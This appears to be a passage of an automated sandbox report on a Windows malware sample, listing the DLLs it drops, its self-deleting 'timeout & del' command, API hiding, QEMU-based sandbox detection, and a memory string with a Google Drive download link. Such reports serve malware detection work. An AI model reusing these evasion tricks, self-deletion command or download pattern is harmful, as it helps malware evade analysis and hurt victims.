Source: C:\Users\user\Desktop\1COK25f1vT.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-utility-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe File created: C:\Users\user\AppData\Local\Temp\2fda\ucrtbase.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe File created: C:\Users\user\AppData\Local\Temp\2fda\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-synch-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-namedpipe-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-private-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-time-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-sysinfo-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-stdio-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe File created: C:\Users\user\AppData\Local\Temp\2fda\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-interlocked-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-runtime-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe File created: C:\Users\user\AppData\Local\Temp\2fda\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe File created: C:\Users\user\AppData\Local\Temp\2fda\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-handle-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe File created: C:\Users\user\AppData\Local\Temp\2fda\nssdbm3.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-rtlsupport-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-synch-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-convert-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-math-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe File created: C:\Users\user\AppData\Local\Temp\2fda\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-file-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-libraryloader-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-multibyte-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-processenvironment-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-process-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-file-l2-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-processthreads-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-locale-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-heap-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-string-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-datetime-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-heap-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-debug-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-processthreads-l1-1-1.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-localization-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-conio-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-environment-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe File created: C:\Users\user\AppData\Local\Temp\2fda\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-filesystem-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-memory-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-file-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-profile-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-errorhandling-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-string-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-timezone-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-console-l1-1-0.dll Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Self deletion via cmd delete
Source: C:\Users\user\Desktop\1COK25f1vT.exe Process created: C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "1COK25f1vT.exe
Source: C:\Users\user\Desktop\1COK25f1vT.exe Process created: C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "1COK25f1vT.exe Jump to behavior
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_2_00417216 LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 12_2_00417216
Source: C:\Users\user\Desktop\1COK25f1vT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1COK25f1vT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1COK25f1vT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1COK25f1vT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1COK25f1vT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1COK25f1vT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1COK25f1vT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1COK25f1vT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1COK25f1vT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1COK25f1vT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1COK25f1vT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1COK25f1vT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1COK25f1vT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1COK25f1vT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Tries to detect Any.run
Source: C:\Users\user\Desktop\1COK25f1vT.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\Desktop\1COK25f1vT.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Users\user\Desktop\1COK25f1vT.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\Desktop\1COK25f1vT.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: 1COK25f1vT.exe, 0000000C.00000002.511282880.0000000002150000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=17RU0VECH2DONYHAGWGUE-YWT9AUTZSM-
Source: 1COK25f1vT.exe, 0000000C.00000002.511282880.0000000002150000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_2_00416290 LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,GetCurrentProcessId, 12_2_00416290
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\1COK25f1vT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-util-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-multibyte-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-utility-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-processenvironment-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-process-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-synch-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-file-l2-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-heap-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-processthreads-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-locale-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-string-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-datetime-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-namedpipe-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-private-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-heap-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-sysinfo-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-time-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-debug-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-processthreads-l1-1-1.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-stdio-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-interlocked-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-localization-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-conio-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-environment-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-runtime-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-filesystem-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-memory-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-handle-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-file-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\nssdbm3.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-profile-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-synch-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-rtlsupport-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-errorhandling-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-convert-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-math-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-string-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe